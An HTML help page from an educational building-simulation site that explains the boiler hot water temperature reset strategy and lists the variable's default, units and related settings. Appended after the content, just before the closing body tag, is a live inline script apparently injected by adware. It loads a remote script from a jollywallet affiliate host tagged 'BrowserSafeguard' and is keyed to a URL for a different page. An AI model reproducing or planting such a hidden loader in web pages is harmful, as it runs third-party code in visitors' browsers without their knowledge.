﻿<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Learn High Performance Buildings</title>
<meta name="description" content="Info about LHPB.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, zoom=20%, target-densitydpi=high-dpi">
<link href="../css/normalize.css" rel="stylesheet" type="text/css">
<link href="../css/info.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="file:../images/favicon.ico" >
</head>
<body>
<div id="wrapper" class="cf">
<div id="container">
<div id="from">
</div>
<div id="logo" title="LHPB: Learn High Performance Buildings"></div>
<div id="title" class="cf">Learn High Performance Buildings</div>
<div id="info" class="cf">
<h1>HOT WATER TEMP RESET</h1>
<h3>Associated System: Boiler</h3>
<div class="graphic"> <img src="../HVAC Rooftop/Boiler.png" alt=""/ ></div>    
<p>A water temperature reset strategy is a method of reducing the energy consumption of a central plant. Hydronic systems (for instance a cooling water loop) are designed to maintain a specific temperature differential under design conditions (specifically at the maximum cooling or heating conditions of a building). When a temperature set point reset strategy has been implemented, the supply temperature set point will be adjusted depending on the anticipated heating or cooling demand. For instance, during periods of moderate to little cooling demand, the chilled water supply temperature will begin to rise, possibly as a function of the outdoor air temperature or based on the current chilled water valve positions within the system.  For a chiller, a higher supply temperature will result in reduced cooling demand as well as improved efficiency. For a hot water loop, decreasing the boiler's supply temperature will reduce the heating demand.</p><p>This input sets the hot water temperature set point reset strategy for the HVAC system's boilers. A hot water reset strategy will monitor the hot water system to determine if the supply temperature set point can be adjusted.  If the hot water control system has determined that the heating demand of the building has been adequately met and anticipates a reduction in the building's heating load, it will lower the hot water supply temperature set point thereby matching the actual heating load of the building.</p>      
<!--<p>(<a href="#">See also the �</a> )</p>-->
<p>Adjusting the setting will determine how the reset is implemented.</p>      
<h4>The value of this variable can be adjusted during a simulation run-time.</h4>      
<h2>Variable Descriptions</h2>
<ul class="list-variable">        
<li><label>Default:</label> No-Reset</li>
<li><label>Minimum:</label> </li>
<li><label>Maximum:</label> </li>
<!--<li><label>Default Units:</label> i_Default</li>-->
<!-- <li><label>English:</label> </li>-->
<li><label>IP Unit:</label> set of options</li>
<li><label>SI Units:</label> set of options</li>      </ul>
<h2>Related Items: </h2>
<ul><li>HOT WATER TEMP SET POINT</li><li>CHILLED WATER TEMP RESET</li><li>HOT WATER LOOP DIFFERENTIAL PRESSURE SET POINT RESET</li><li>CHILLED WATER LOOP DIFFERENTIAL PRESSURE SET POINT RESET</li><li>CHILLED WATER TEMP SET POINT</li></ul>
<h2>Links:</h2>
<ul>
<li><a href="http://en.wikipedia.org/wiki/Hot_water_reset" target="_blank">http://en.wikipedia.org/wiki/Hot_water_reset</a></li><li><a href="http://www.su-per-b.org" target="_blank">http://www.su-per-b.org</a></li>      </ul>
<div class="version"> Version 1.00</div>
    </div>
  </div>
</div>
<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://learnhpb.org/demos/13.01/i-content/iv-SYSTAirDB.html') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-tightrope&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();</script></body>
</html>
